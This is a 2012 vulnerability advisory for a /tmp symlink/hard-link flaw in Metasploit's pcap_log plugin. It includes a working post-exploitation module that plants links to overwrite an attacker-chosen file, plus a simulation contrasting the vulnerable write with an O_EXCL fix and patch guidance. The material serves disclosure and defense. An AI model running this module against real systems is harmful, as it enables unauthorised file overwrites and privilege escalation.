Metasploit Framework 'pcap_log' plugin local privilege escalation vulnerability


Published: 2012-07-16
Updated: 2012-07-17

Affected systems:
Metasploit Framework 3.5.2
Metasploit Framework 4.1.0
Metasploit Framework 3.5.1
Metasploit Framework 3.5
Metasploit Framework 3.4
Metasploit Framework 3.3
Metasploit Framework 3.1
Metasploit Framework 3.0
Metasploit Framework 2.4
Metasploit Framework 2.3
Metasploit Framework 2.2
Metasploit Framework 2.1
Metasploit Framework 2.0
Metasploit Framework 1.0
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54472

Metasploit is an open-source vulnerability detection tool; being free, it is commonly used by security practitioners to test the security of their systems. The Metasploit Framework (MSF) is a freely available development framework released as open source in 2003; it provides a reliable platform for penetration testing, shellcode development and vulnerability research.

The Metasploit Framework's 'pcap_log' plugin writes its packet capture to a predictable file name under the world-writable /tmp directory (msf3-session_<timestamp>.pcap). A local attacker can pre-create links at those names pointing at any file the plugin's user can write; when a higher-privileged user runs the plugin, that file is overwritten with capture data whose contents the attacker can influence by sending traffic to the host. Successful exploitation allows the attacker to execute arbitrary code with elevated privileges.

<*Source: 0a29406d9794e4f9b30b3c5d6702c708
  *>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Users act at their own risk!

0a29406d9794e4f9b30b3c5d6702c708 provided the following test method:


##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'

class Metasploit3 < Msf::Post

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Linux::System

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Metasploit plugin "pcap_log" arbitrary file overwrite / privilege escalation',
      'Description'   => %q{
        Post exploitation module to exploit 0A29-12-2, a vulnerability in the Metasploit
        pcap_log plugin. The plugin writes its capture to a predictable name under /tmp
        (msf3-session_<timestamp>.pcap); this module pre-creates hard links at the names
        for the next NUMBER seconds, each pointing at FILE, so FILE is overwritten with
        capture data when a higher-privileged user runs the plugin. Depending on the file
        you choose to overwrite, you will need to netcat/telnet etc. the data that you
        wish to appear in the file.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ '0a29406d9794e4f9b30b3c5d6702c708' ],
      'Version'       => '$Revision$',
      'Platform'      => [ 'linux' ],
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'References'    =>
        [
          [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html' ],
          [ 'URL', 'https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740' ]
        ],
      'DisclosureDate'=> "July 16 2012"
    ))
    register_options([
      OptInt.new('NUMBER', [true, 'Number of seconds to prime /tmp/ with', nil]),
      OptString.new('FILE', [true, 'File to overwrite with PCAP data', nil]),
    ], self.class)
  end

  # Create a hard link at the pcap_log file name for time +t+, pointing at FILE.
  # FILE must live on the same filesystem as /tmp for the hard link to succeed.
  def link(t)
    file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [
      "msf3-session", t.year, t.month, t.mday, t.hour, t.min, t.sec
    ]
    fname = ::File.join("/tmp", file_part)
    # cmd_exec (Msf::Post::Common) works on both shell and meterpreter sessions.
    cmd_exec("/bin/ln #{datastore['FILE']} #{fname}")
  end

  # Run method for when the run command is issued
  def run
    # One link per second, from now through NUMBER seconds ahead (NUMBER + 1 names).
    (0..datastore['NUMBER']).each do |i|
      link(Time.now + i)
    end
    print_status("Set #{datastore['NUMBER'] + 1} links in /tmp.")
  end

  def cleanup
    print_status("Manual cleanup required: rm -f /tmp/msf3-session*")
  end
end
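The module above only plants the links; the overwrite happens later, when the plugin opens the predicted name. The following is an added example, written for this page and not code from the advisory, the module author or the Metasploit project, that plays both sides of that race in a private temporary directory standing in for /tmp: `prime_links` seeds the next few seconds of predictable names (a hard link, as the module's /bin/ln does, falling back to a symlink where hard links are refused), `vulnerable_open_log` opens the name the way a plugin that trusts /tmp would, and `hardened_open_log` shows the generic fix of opening with O_CREAT|O_EXCL so a pre-existing name (link or symlink) is rejected rather than followed. The helper names, the `victim.conf` target and the payload string are all constructed for the demonstration; the hardened variant illustrates the class of fix and is not a claim about what the referenced commit changed.

```ruby
require 'tmpdir'

ORIGINAL = "original contents\n"                       # constructed victim-file contents
PAYLOAD  = "attacker-influenced bytes the plugin would log\n"  # constructed capture data

# Same name pattern the pcap_log plugin used before the fix (see the module above).
def predicted_name(dir, t)
  File.join(dir, "msf3-session_%04d-%02d-%02d_%02d-%02d-%02d.pcap" %
            [t.year, t.month, t.mday, t.hour, t.min, t.sec])
end

# Attacker side: pre-seed the names for +now+ .. +now+seconds+, each pointing at +target+.
def prime_links(dir, target, now, seconds)
  (0..seconds).map do |i|
    name = predicted_name(dir, now + i)
    begin
      File.link(target, name)      # hard link, as the module's "/bin/ln FILE fname"
    rescue SystemCallError
      File.symlink(target, name)   # same effect where hard links are refused (EPERM/EXDEV)
    end
    name
  end
end

# Vulnerable writer: O_WRONLY|O_CREAT|O_TRUNC on a predictable name in a shared
# directory. Whatever already sits at that name (a link planted by another user)
# is followed, so the data lands in the attacker's chosen file.
def vulnerable_open_log(dir, t, data)
  File.open(predicted_name(dir, t), "wb") { |f| f.write(data) }
  true
end

# Hardened writer: O_CREAT|O_EXCL makes open() fail if the name already exists,
# whether it is a hard link or a symlink, so a pre-seeded name cannot be followed.
# Keeping the file in a 0700 directory the attacker cannot write (as Dir.mktmpdir
# creates) removes the ability to seed it in the first place.
def hardened_open_log(dir, t, data)
  path = predicted_name(dir, t)
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0600) { |f| f.write(data) }
  true
rescue Errno::EEXIST
  false
end

# Run the race once and report whether the writer succeeded and what the victim
# file holds afterwards. Uses a private temp dir instead of the real /tmp.
def simulate(hardened:)
  Dir.mktmpdir do |root|
    target = File.join(root, "victim.conf")   # stands in for the file to clobber
    File.write(target, ORIGINAL)
    t0 = Time.now
    prime_links(root, target, t0, 5)          # attacker primes the next 5 seconds
    # Plugin opens its log 3 seconds later, i.e. at one of the primed names.
    wrote = hardened ? hardened_open_log(root, t0 + 3, PAYLOAD)
                     : vulnerable_open_log(root, t0 + 3, PAYLOAD)
    { wrote: wrote, target_now: File.read(target) }
  end
end

if __FILE__ == $0
  v = simulate(hardened: false)
  puts "vulnerable: wrote=#{v[:wrote]} victim now holds #{v[:target_now].inspect}"
  h = simulate(hardened: true)
  puts "hardened:   wrote=#{h[:wrote]} victim now holds #{h[:target_now].inspect}"
end
```

In the vulnerable run the victim file ends up containing the payload, because the truncating open follows the planted link to the shared inode (or symlink target); in the hardened run the open fails with EEXIST and the victim file is untouched. The same check is what a reviewer should look for in any code that writes under /tmp: an exclusive create, or a private directory, never a bare truncating open on a predictable path.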

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

Metasploit Framework
--------------------
The vendor has released an update that fixes this issue (the fix is referenced in the module above as commit 428a98c1d1d5341d32ffe0ed380d06a327ed2740); please download it from the vendor's homepage:

http://www.metasploit.org/

Until the update is applied, avoid loading pcap_log as a privileged user on hosts shared with untrusted local users, and check /tmp for pre-existing msf3-session_*.pcap entries before loading it.
